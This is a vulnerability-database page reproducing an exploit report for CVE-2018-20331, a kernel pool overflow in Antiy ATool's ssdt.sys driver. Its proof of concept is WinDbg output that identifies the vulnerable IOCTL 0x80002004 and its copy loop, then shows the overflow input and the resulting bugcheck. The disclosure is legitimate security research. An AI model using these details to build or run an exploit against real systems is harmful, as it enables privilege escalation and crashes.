免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
EXP
# Exploit Title: Kernel Pool Buffer Overflow ATool - 1.0.0.22 (0day) # CVE: CVE-2018-20331 # Date: 21-12-2018 # Software Link: http://www.antiy.net/ <http://www.antiy.net/> # Exploit Author: Aloyce J. Makalanga # Contact: https://twitter.com/aloycemjr <https://twitter.com/aloycemjr> # Vendor Homepage: http://www.antiy.net/ <http://www.antiy.net/> # Category: Windows # Attack Type: local # Impact:Code execution/Denial of Service/Escalation of Privileges 1. Description > Local attackers can trigger a Kernel Pool Buffer Overflow in > Antiy AVL ATool > v1.0.0.22. An attacker must first obtain the ability to execute > low-privileged code on the target system in order to exploit this > vulnerability. The specific flaw exists within the processing of IOCTL > 0x80002004 by the ssdt.sys kernel driver. The bug is > caused by failure to properly validate the length of the user-supplied > data. An attacker can > leverage this vulnerability to execute arbitrary code in the context > of the kernel, which could lead to privilege escalation. A failed > exploit could lead to denial of service. 2. Proof of Concept 0: kd> !drvobj ssdt 2 Driver object (87fe0f38) is for: \Driver\ssdt DriverEntry: aaa0b99e ssdt DriverStartIo: 00000000 DriverUnload: aaa0b828 ssdt AddDevice: 00000000 Dispatch routines: 00 IRP_MJ_CREATE aaa0b686 ssdt+0x686 01 IRP_MJ_CREATE_NAMED_PIPE 82b08da3 nt!IopInvalidDeviceRequest 02 IRP_MJ_CLOSE aaa0b686 ssdt+0x686 03 IRP_MJ_READ 82b08da3 nt!IopInvalidDeviceRequest 04 IRP_MJ_WRITE 82b08da3 nt!IopInvalidDeviceRequest 05 IRP_MJ_QUERY_INFORMATION 82b08da3 nt!IopInvalidDeviceRequest 06 IRP_MJ_SET_INFORMATION 82b08da3 nt!IopInvalidDeviceRequest 07 IRP_MJ_QUERY_EA 82b08da3 nt!IopInvalidDeviceRequest 08 IRP_MJ_SET_EA 82b08da3 nt!IopInvalidDeviceRequest 09 IRP_MJ_FLUSH_BUFFERS 82b08da3 nt!IopInvalidDeviceRequest 0a IRP_MJ_QUERY_VOLUME_INFORMATION 82b08da3 nt!IopInvalidDeviceRequest 0b IRP_MJ_SET_VOLUME_INFORMATION 82b08da3 nt!IopInvalidDeviceRequest 0c IRP_MJ_DIRECTORY_CONTROL 82b08da3 nt!IopInvalidDeviceRequest 0d IRP_MJ_FILE_SYSTEM_CONTROL 82b08da3 nt!IopInvalidDeviceRequest 0e IRP_MJ_DEVICE_CONTROL aaa0b6c8 ssdt+0x6c8 <======================= Dispatch Function 0f IRP_MJ_INTERNAL_DEVICE_CONTROL 82b08da3 nt!IopInvalidDeviceRequest 10 IRP_MJ_SHUTDOWN 82b08da3 nt!IopInvalidDeviceRequest 11 IRP_MJ_LOCK_CONTROL 82b08da3 nt!IopInvalidDeviceRequest 12 IRP_MJ_CLEANUP 82b08da3 nt!IopInvalidDeviceRequest 13 IRP_MJ_CREATE_MAILSLOT 82b08da3 nt!IopInvalidDeviceRequest 14 IRP_MJ_QUERY_SECURITY 82b08da3 nt!IopInvalidDeviceRequest 15 IRP_MJ_SET_SECURITY 82b08da3 nt!IopInvalidDeviceRequest 16 IRP_MJ_POWER 82b08da3 nt!IopInvalidDeviceRequest 17 IRP_MJ_SYSTEM_CONTROL 82b08da3 nt!IopInvalidDeviceRequest 18 IRP_MJ_DEVICE_CHANGE 82b08da3 nt!IopInvalidDeviceRequest 19 IRP_MJ_QUERY_QUOTA 82b08da3 nt!IopInvalidDeviceRequest 1a IRP_MJ_SET_QUOTA 82b08da3 nt!IopInvalidDeviceRequest 1b IRP_MJ_PNP 82b08da3 nt!IopInvalidDeviceRequest 0: kd> bp aaa0b6c8 0: kd> g Breakpoint 0 hit ssdt+0x6c8: aaa0b6c8 8bff mov edi,edi 0: kd> dd edi 87d6d238 00800005 86c620c8 00000000 00000000 87d6d248 00000000 00000000 00000000 00000000 87d6d258 00000000 00000000 00000000 00040002 87d6d268 00000000 00000000 00000000 00000000 87d6d278 00000000 00000001 00000000 00040001 87d6d288 00000000 87d6d28c 87d6d28c 00040000 87d6d298 00000000 87d6d29c 87d6d29c 00000000 87d6d2a8 00000000 87d6d2ac 87d6d2ac 00000000 0: kd> u eip L20 ssdt+0x6c8: aaa0b6c8 8bff mov edi,edi aaa0b6ca 55 push ebp aaa0b6cb 8bec mov ebp,esp aaa0b6cd 83ec0c sub esp,0Ch aaa0b6d0 53 push ebx aaa0b6d1 8b5d0c mov ebx,dword ptr ebp+0Ch aaa0b6d4 8b4360 mov eax,dword ptr ebx+60h aaa0b6d7 56 push esi aaa0b6d8 33f6 xor esi,esi aaa0b6da 89731c mov dword ptr ebx+1Ch,esi aaa0b6dd 8b5004 mov edx,dword ptr eax+4 aaa0b6e0 8b4808 mov ecx,dword ptr eax+8 aaa0b6e3 8b400c mov eax,dword ptr eax+0Ch aaa0b6e6 3d00200080 cmp eax,80002000h aaa0b6eb 57 push edi aaa0b6ec 8b7b0c mov edi,dword ptr ebx+0Ch aaa0b6ef 8955fc mov dword ptr ebp-4,edx aaa0b6f2 0f84d7000000 je ssdt+0x7cf (aaa0b7cf) aaa0b6f8 3d04200080 cmp eax,80002004h <======================== Vulnerable IOCTL aaa0b6fd 7442 je ssdt+0x741 (aaa0b741) aaa0b6ff 3d08200080 cmp eax,80002008h aaa0b704 7531 jne ssdt+0x737 (aaa0b737) aaa0b706 8b37 mov esi,dword ptr edi aaa0b708 56 push esi aaa0b709 68a4b6a0aa push offset ssdt+0x6a4 (aaa0b6a4) aaa0b70e e873fdffff call ssdt+0x486 (aaa0b486) aaa0b713 a10cb5a0aa mov eax,dword ptr ssdt+0x50c (aaa0b50c) aaa0b718 3b7008 cmp esi,dword ptr eax+8 aaa0b71b 59 pop ecx aaa0b71c 59 pop ecx aaa0b71d 7714 ja ssdt+0x733 (aaa0b733) aaa0b71f 8b00 mov eax,dword ptr eax 0: kd> u . L40 ssdt+0x6f8: aaa0b6f8 3d04200080 cmp eax,80002004h aaa0b6fd 7442 je ssdt+0x741 (aaa0b741) aaa0b6ff 3d08200080 cmp eax,80002008h aaa0b704 7531 jne ssdt+0x737 (aaa0b737) aaa0b706 8b37 mov esi,dword ptr edi aaa0b708 56 push esi aaa0b709 68a4b6a0aa push offset ssdt+0x6a4 (aaa0b6a4) aaa0b70e e873fdffff call ssdt+0x486 (aaa0b486) aaa0b713 a10cb5a0aa mov eax,dword ptr ssdt+0x50c (aaa0b50c) aaa0b718 3b7008 cmp esi,dword ptr eax+8 aaa0b71b 59 pop ecx aaa0b71c 59 pop ecx aaa0b71d 7714 ja ssdt+0x733 (aaa0b733) aaa0b71f 8b00 mov eax,dword ptr eax aaa0b721 8b04b0 mov eax,dword ptr eax+esi*4 aaa0b724 8907 mov dword ptr edi,eax aaa0b726 8b45fc mov eax,dword ptr ebp-4 aaa0b729 89431c mov dword ptr ebx+1Ch,eax aaa0b72c 33f6 xor esi,esi aaa0b72e e9ad000000 jmp ssdt+0x7e0 (aaa0b7e0) aaa0b733 83631c00 and dword ptr ebx+1Ch,0 aaa0b737 be0d0000c0 mov esi,0C000000Dh aaa0b73c e99f000000 jmp ssdt+0x7e0 (aaa0b7e0) aaa0b741 6844646b20 push 206B6444h <======================= Pooltag aaa0b746 c1e902 shr ecx,2 aaa0b749 52 push edx aaa0b74a 8bf1 mov esi,ecx aaa0b74c 6a00 push 0 <==================================Pool type aaa0b74e 1: kd> u . L20 ssdt+0x782: aaa0b782 8911 mov dword ptr ecx,edx aaa0b784 83c104 add ecx,4 aaa0b787 ff4df8 dec dword ptr ebp-8 aaa0b78a 75e5 jne ssdt+0x771 (aaa0b771) aaa0b78c 8b75f4 mov esi,dword ptr ebp-0Ch aaa0b78f 8b0d0cb5a0aa mov ecx,dword ptr ssdt+0x50c (aaa0b50c) aaa0b795 3b7108 cmp esi,dword ptr ecx+8 aaa0b798 7316 jae ssdt+0x7b0 (aaa0b7b0) aaa0b79a 8bd6 mov edx,esi aaa0b79c 8b09 mov ecx,dword ptr ecx aaa0b79e 8b0c91 mov ecx,dword ptr ecx+edx*4 aaa0b7a1 890c90 mov dword ptr eax+edx*4,ecx aaa0b7a4 8b0d0cb5a0aa mov ecx,dword ptr ssdt+0x50c (aaa0b50c) aaa0b7aa 42 inc edx aaa0b7ab 3b5108 cmp edx,dword ptr ecx+8 aaa0b7ae 72ec jb ssdt+0x79c (aaa0b79c) aaa0b7b0 8b4dfc mov ecx,dword ptr ebp-4 aaa0b7b3 8bd1 mov edx,ecx aaa0b7b5 c1e902 shr ecx,2 aaa0b7b8 8bf0 mov esi,eax aaa0b7ba f3a5 rep movs dword ptr es:edi,dword ptr esi aaa0b7bc 8bca mov ecx,edx aaa0b7be 83e103 and ecx,3 aaa0b7c1 50 push eax aaa0b7c2 f3a4 rep movs byte ptr es:edi,byte ptr esi <======================= Vulnerable copy 1: kd> dc edi 85a6ce00 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA <================ Evil user input 85a6ce10 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 85a6ce20 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 85a6ce30 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 85a6ce40 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 85a6ce50 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 85a6ce60 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 85a6ce70 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 1: kd> g *** Fatal System Error: 0x00000019 (0x00000020,0x892CF250,0x892CF260,0x08020012) Break instruction exception - code 80000003 (first chance) A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. 1: kd> !analyze -v ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* BAD_POOL_HEADER (19) The pool is already corrupt at the time of the current request. This may or may not be due to the caller. The internal pool links must be walked to figure out a possible cause of the problem, and then special pool applied to the suspect tags or the driver verifier to a suspect driver. Arguments: Arg1: 00000020, a pool block header size is corrupt. Arg2: 892cf250, The pool entry we were looking for within the page. Arg3: 892cf260, The next pool entry. Arg4: 08020012, (reserved 3. Solution: None
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库